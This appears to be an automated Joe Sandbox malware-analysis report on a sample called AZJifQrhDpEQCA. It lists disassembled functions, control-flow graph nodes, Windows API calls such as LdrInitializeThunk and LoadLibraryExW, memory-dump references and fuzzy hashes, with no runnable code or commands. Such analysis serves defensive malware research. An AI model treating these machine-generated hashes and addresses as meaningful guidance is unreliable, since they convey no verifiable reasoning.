                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: a58ecd675b7adcd75712aa03bdd9d232ad83d9f92708df8a63df53682bc55cb9
                                                • Instruction ID: 200293edfe98c4c07945630452e476f32201631388cf5cb94f3ffe233510f460
                                                • Opcode Fuzzy Hash: a58ecd675b7adcd75712aa03bdd9d232ad83d9f92708df8a63df53682bc55cb9
                                                • Instruction Fuzzy Hash: E01112B69002498FDB10CF9AD444ADEFFF4EB88320F14846AD459A7350C375A945CFA4
                                                Function 00B0B2C0 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 690 b0b2c0-b0b2c8 691 b0b269-b0b297 LoadLibraryExW 690->691 692 b0b2ca-b0b2dd 690->692 694 b0b2a0-b0b2bd 691->694 695 b0b299-b0b29f 691->695 696 b0b2e4-b0b2f0 692->696 697 b0b2df-b0b2e3 692->697 695->694 701 b0b2f2-b0b2f9 696->701 702 b0b2fa-b0b30f call b0a0e8 696->702
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0B079,00000800,00000000,00000000), ref: 00B0B28A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6cddbd9ba08dbbbfcb462a6a238de6371ecee5adfdba5ef4b70a5ec408cf022a
                                                • Instruction ID: cd0ad7511657f0ed64e4b6c855ac52ff687dea70448af18a4b202d1d01f3570d
                                                • Opcode Fuzzy Hash: 6cddbd9ba08dbbbfcb462a6a238de6371ecee5adfdba5ef4b70a5ec408cf022a
                                                • Instruction Fuzzy Hash: 0701DF729043048FDB108FADD804BCEBFF4EF5A324F14809AE158D72A1C3B9A845CBA5
                                                Function 070F1621 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 706 70f1621-70f1622 707 70f1628-70f1692 PostMessageW 706->707 708 70f1624-70f1626 706->708 709 70f169b-70f16af 707->709 710 70f1694-70f169a 707->710 708->707 710->709
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070F1685
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1807192793.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 80832df05b27e54595d3e73a374f455747e602fd0583284a8ac2b822d22eb9c9
                                                • Instruction ID: 72fb2aaf93f8e34d4cef4f6604ebf9392b55c89d933df13f79925c7aa3cabf81
                                                • Opcode Fuzzy Hash: 80832df05b27e54595d3e73a374f455747e602fd0583284a8ac2b822d22eb9c9
                                                • Instruction Fuzzy Hash: 221122B5800389DFDB10CF9AD884BDEBFF8EB48320F24841AE558A7600C375A584CFA5
                                                Function 00B0AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 712 b0af98-b0afd8 713 b0afe0-b0b00b GetModuleHandleW 712->713 714 b0afda-b0afdd 712->714 715 b0b014-b0b028 713->715 716 b0b00d-b0b013 713->716 714->713 716->715
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0AFFE
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1768075210.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_b00000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: a5567bd2bf757fc5770d5c3732f2da968287b352dea692f481fbf9d83503a28b
                                                • Instruction ID: 431d252bf4dd142cfa53585ffbdf3b16e74d0122872c21fd7a89e649c784d708
                                                • Opcode Fuzzy Hash: a5567bd2bf757fc5770d5c3732f2da968287b352dea692f481fbf9d83503a28b
                                                • Instruction Fuzzy Hash: 151110B6C003498FCB20CF9AD444BDEFBF4EB88324F10846AD469A7250D375A545CFA1
                                                Function 070F1628 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 070F1685
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1807192793.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_70f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 8aa12cafe65ad89900d09b9666552aef9d58f1231b31e80e601a4f78ff44f23b
                                                • Instruction ID: 8df52447d339c9195b59409d2d1538d0fb1d057ccaf28327e02baa28c04aebde
                                                • Opcode Fuzzy Hash: 8aa12cafe65ad89900d09b9666552aef9d58f1231b31e80e601a4f78ff44f23b
                                                • Instruction Fuzzy Hash: F61112B5800349DFDB10CF9AD885BDEFBF8EB48324F20841AE558A7600C375A984CFA5
                                                Function 0098D4C4 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767625032.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_98d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aaf95585ba8220fa108b53cadd612a1147a7df50d8cc38f91afb1dffb6ac5b1f
                                                • Instruction ID: 6b4be670874afbfacc8018e10eb7f760a02556348f304e3e4c753bf84d4baa7a
                                                • Opcode Fuzzy Hash: aaf95585ba8220fa108b53cadd612a1147a7df50d8cc38f91afb1dffb6ac5b1f
                                                • Instruction Fuzzy Hash: 2221C171505240DFDB05EF14D980F26BF65FB98318F24C56AE9094A39AC33AD856CBA1
                                                Function 0099D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d838e46078ea7b87d4dd9b6278415388b9af336665133fb48b031c21c341b28
                                                • Instruction ID: db115e86e47775a99e2bb9ae61379b3ed41951b4b0116649cad5a86972b6f925
                                                • Opcode Fuzzy Hash: 2d838e46078ea7b87d4dd9b6278415388b9af336665133fb48b031c21c341b28
                                                • Instruction Fuzzy Hash: 3A21F271604200DFDF14DF28D9C4B26BBA5FB98314F24C969D84A4B296C33BD847CA61
                                                Function 0099D1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2c724f12380cda2090247ebdf8e53f88d453b91ab233c60bcde5f00d3cb5978
                                                • Instruction ID: e8dea7e3599b384330e39f5ebb83059436ad4368f430d0299e7a520011a05f8c
                                                • Opcode Fuzzy Hash: a2c724f12380cda2090247ebdf8e53f88d453b91ab233c60bcde5f00d3cb5978
                                                • Instruction Fuzzy Hash: DC212671504200EFDF05DF18DAC0B2ABBA9FB94314F20CA6DE9094B296C33AD846CB61
                                                Function 0099D006 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0f3bbd2f5edca58883f8d2c80465efc9cf5b10ce80715f4c6ceff05a7acde5b
                                                • Instruction ID: 850d14cf27e75906a573e7d5ba01a36a1cdcc973a40967ae3e8fc063803de788
                                                • Opcode Fuzzy Hash: b0f3bbd2f5edca58883f8d2c80465efc9cf5b10ce80715f4c6ceff05a7acde5b
                                                • Instruction Fuzzy Hash: 39215E755093808FDB12CF24D9D4715BF71EB56314F28C5EAD8498F6A7C33A980ACB62
                                                Function 0098D4BF Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767625032.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_98d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: ec7c23e9c81083cf06f9bffea725b74a898947c80c3532c119f9eabcbe1c9a31
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: 61110372404280CFCB02DF10D5C4B16BF71FB94318F24C6AAE8090B75AC336D85ACBA1
                                                Function 0099D1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1767666781.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_99d000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: d68d71861e3c40c46f3cad03cd7d6f6503d32b6177b4ddba4461d3f8a84b681f
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 98118B75504280DFDB16CF14D5C4B19BBA1FB94314F24C6AAD8494B696C33AD84ACB61

                                                Execution Graph

                                                Execution Coverage:0.1%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:5
                                                Total number of Limit Nodes:1
                                                execution_graph 61504 1162b60 LdrInitializeThunk 61505 1162c00 61507 1162c0a 61505->61507 61508 1162c11 61507->61508 61509 1162c1f LdrInitializeThunk 61507->61509

                                                Executed Functions

                                                Function 01162C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 1162c0a-1162c0f 1 1162c11-1162c18 0->1 2 1162c1f-1162c26 LdrInitializeThunk 0->2
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0117FD4F,000000FF,00000024,01216634,00000004,00000000,?,-00000018,7D810F61,?,?,01138B12,?,?,?,?), ref: 01162C24
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a283ee241973d20a64bc7301b761d1c13090e05b88268497dc44042106a35e5a
                                                • Instruction ID: 6f95fda90829e7cc92d16866cb438b0c781fc5a6699eab2012741425aa1bce24
                                                • Opcode Fuzzy Hash: a283ee241973d20a64bc7301b761d1c13090e05b88268497dc44042106a35e5a
                                                • Instruction Fuzzy Hash: 39B09B719015C5C9DA15F764470C717791477D0701F25C071D2030651F4739C1D1E275
                                                Function 011635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 7 11635c0-11635cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 47e61122f172937ae8d00d1a91354c76111bc0b577d20f17db9dcb0ecfece106
                                                • Instruction ID: f6c3b1d9a17d968a2e49635b92f18c3a7a27fe1d8aa7139e2ade80c0bba2b3ce
                                                • Opcode Fuzzy Hash: 47e61122f172937ae8d00d1a91354c76111bc0b577d20f17db9dcb0ecfece106
                                                • Instruction Fuzzy Hash: 7190023160550402D10471584618706101597D0201F65C421A0425578DC7958A5166A2
                                                Function 01162B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4 1162b60-1162b6c LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(01190DBD,?,?,?,?,01184302), ref: 01162B6A
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 97f3f715e450d75a5fb9a87e48f562db2134a1d4205c07e97bc8e1b51cf6ee01
                                                • Instruction ID: ee57ec8d60bc5d85c39ed338f11116dacb4ec1f7d13f52e05984c22b96c65e44
                                                • Opcode Fuzzy Hash: 97f3f715e450d75a5fb9a87e48f562db2134a1d4205c07e97bc8e1b51cf6ee01
                                                • Instruction Fuzzy Hash: 9590026120240003410971584518616401A97E0201B55C031E10155A0DC62589916225
                                                Function 01162DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 6 1162df0-1162dfc LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0119E73E,0000005A,011FD040,00000020,00000000,011FD040,00000080,01184A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0116AE00), ref: 01162DFA
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 16aa899cff463c1e899a53ed26cc8cac676d3867bf27b67460a8a8ef120266d8
                                                • Instruction ID: 042508d184cbd46dd115a12e78de89dd8edf7908fb042ff4b00972b947d89437
                                                • Opcode Fuzzy Hash: 16aa899cff463c1e899a53ed26cc8cac676d3867bf27b67460a8a8ef120266d8
                                                • Instruction Fuzzy Hash: 1790023120140413D11571584608707001997D0241F95C422A0425568DD7568A52A221
                                                Function 01162C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 1162c70-1162c7c LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0111FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01177BE5,00001000,00004000,000000FF,?,00000000), ref: 01162C7A
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ec0472c0589dbdf518141de88c1adccb124e643231037fa7568986adb1b5651c
                                                • Instruction ID: d71efd5dc7b11a8a3131254ec157988a064c913faec088c8651181c2523f62f7
                                                • Opcode Fuzzy Hash: ec0472c0589dbdf518141de88c1adccb124e643231037fa7568986adb1b5651c
                                                • Instruction Fuzzy Hash: F890023120148802D1147158850874A001597D0301F59C421A4425668DC79589917221
                                                Function 0042D79F Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 8 42d79f 9 42d7a3-42d7b8 8->9 10 42d7be-42d7c5 9->10 11 42d7c7-42d7c9 10->11 12 42d7d9-42d7dc 10->12 11->12 13 42d7cb-42d7d7 call 42d763 11->13 13->12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: >
                                                • API String ID: 0-325317158
                                                • Opcode ID: ac0b90a2921b8b4b87005439004dc3a3b499ea42fb41ec72e2fef2368e930d8d
                                                • Instruction ID: 4a1ac05c77454eacf8ee53e46d91bd29597805342aa1498ae6ccd5dde9ba1219
                                                • Opcode Fuzzy Hash: ac0b90a2921b8b4b87005439004dc3a3b499ea42fb41ec72e2fef2368e930d8d
                                                • Instruction Fuzzy Hash: 4AE0D832B0022433D6216A49AC0AF97779CCBC1F60F48006AFE0897341E7ACA900C2E8
                                                Function 0042C30C Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 16 42c30c-42c31f 17 42c321-42c322 16->17 18 42c2c5-42c2c7 16->18 19 42c397-42c398 17->19 20 42c324-42c338 17->20 21 42c2cd-42c2d2 18->21 22 42c2c8 call 42d6c3 18->22 25 42c39d-42c3a7 19->25 24 42c2d7-42c2db 20->24 26 42c33a-42c346 20->26 21->24 22->21 27 42c3ad-42c3c2 25->27 28 42c348 26->28 29 42c399 26->29 27->27 30 42c3c4-42c3f0 27->30 31 42c2e3-42c2ee 28->31 32 42c34a-42c36d 28->32 29->25 30->25 34 42c2f0-42c2fa 31->34 32->19 34->32 37 42c2fc-42c304 34->37 37->34 38 42c306-42c307 37->38 38->16
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 442f62d012a73f28da484176fa8fa01c85776a7b704259d85493f936d5429327
                                                • Instruction ID: 4271448dea9d105fa56ca72284096173999569e9fa6681c89d5a34676f9a7603
                                                • Opcode Fuzzy Hash: 442f62d012a73f28da484176fa8fa01c85776a7b704259d85493f936d5429327
                                                • Instruction Fuzzy Hash: 64313521A886668BC311AB7C64C22DE7F20DF673303944AABC481CF681EA159913C3DE
                                                Function 0042C223 Relevance: .1, Instructions: 70COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 39 42c223-42c25d call 42ccf3 44 42c268-42c278 39->44 45 42c25f-42c267 39->45 44->45 47 42c27a-42c2c8 call 42d713 call 42d6c3 44->47 52 42c2cd-42c2db 47->52
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4d084e5a53d3ff122135d0dee7fe90161cc350c96c65b62282fa447d0194857
                                                • Instruction ID: 74ef00848ca0dbf3c54f6f02862389169a9d483b4a2a89aa5cf51ef78fe7d416
                                                • Opcode Fuzzy Hash: b4d084e5a53d3ff122135d0dee7fe90161cc350c96c65b62282fa447d0194857
                                                • Instruction Fuzzy Hash: 77110B717446147BD610DB65DC82FDB739CDF89714F80005EFA0C8B141D6B5AE4183E5
                                                Function 0042D2AF Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 54 42d2af-42d2d4 call 42d763 56 42d2d9-42d2e0 54->56 57 42d2ef-42d2f4 56->57 58 42d343-42d348 57->58 59 42d2f6-42d2ff 57->59 60 42d30e-42d313 59->60 61 42d326-42d32c 60->61 62 42d315-42d323 60->62 64 42d332-42d340 61->64 62->61 64->58
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b5b6527aca6cdceab5b792cec4a554bb54598368c0bab5ac9b89d69161ef3da
                                                • Instruction ID: a43fa10a4b7e56e9f64a2f3da58ad2d6bdbb16579d796921415ee1d64c98ad4b
                                                • Opcode Fuzzy Hash: 8b5b6527aca6cdceab5b792cec4a554bb54598368c0bab5ac9b89d69161ef3da
                                                • Instruction Fuzzy Hash: 8501DB71E4021856FB20EB91EC46FD973749B48304F940ADFB50CA6582FB79A7448F95
                                                Function 0042D2B3 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 66 42d2b3-42d2ca 67 42d2d9-42d2f4 66->67 68 42d2d4 call 42d763 66->68 70 42d343-42d348 67->70 71 42d2f6-42d313 67->71 68->67 73 42d326-42d32c 71->73 74 42d315-42d323 71->74 76 42d332-42d340 73->76 74->73 76->70
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95434a5b30f10c527bd9ad3f114da260538c72fd43db1b6d58504dd90ab6435b
                                                • Instruction ID: 25006c249a9391471495b67bfc2ebdd31ad6c1e806e0a31c38e664269ee6bedb
                                                • Opcode Fuzzy Hash: 95434a5b30f10c527bd9ad3f114da260538c72fd43db1b6d58504dd90ab6435b
                                                • Instruction Fuzzy Hash: 8B01DB71E4021856FB20EB51EC46FD973789B48304F540ADFB50C62582FF79A7448F99
                                                Function 0042C21D Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 78 42c21d-42c23e call 42ccf3 81 42c243-42c250 78->81 82 42c256-42c25d 81->82 83 42c268-42c26d 82->83 84 42c25f-42c267 82->84 85 42c273-42c278 83->85 85->84 86 42c27a-42c298 call 42d713 85->86 88 42c29d-42c2c8 call 42d6c3 86->88 91 42c2cd-42c2db 88->91
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0d106c31891a226cd87e7a5c0fe3ccec5d5b48e0463ffdbb6e27cbba1f7dafa
                                                • Instruction ID: 8e7756f43fb11b1c9e872fadfe7107a356797b4b26212f5eb67ff1b9c473cb15
                                                • Opcode Fuzzy Hash: d0d106c31891a226cd87e7a5c0fe3ccec5d5b48e0463ffdbb6e27cbba1f7dafa
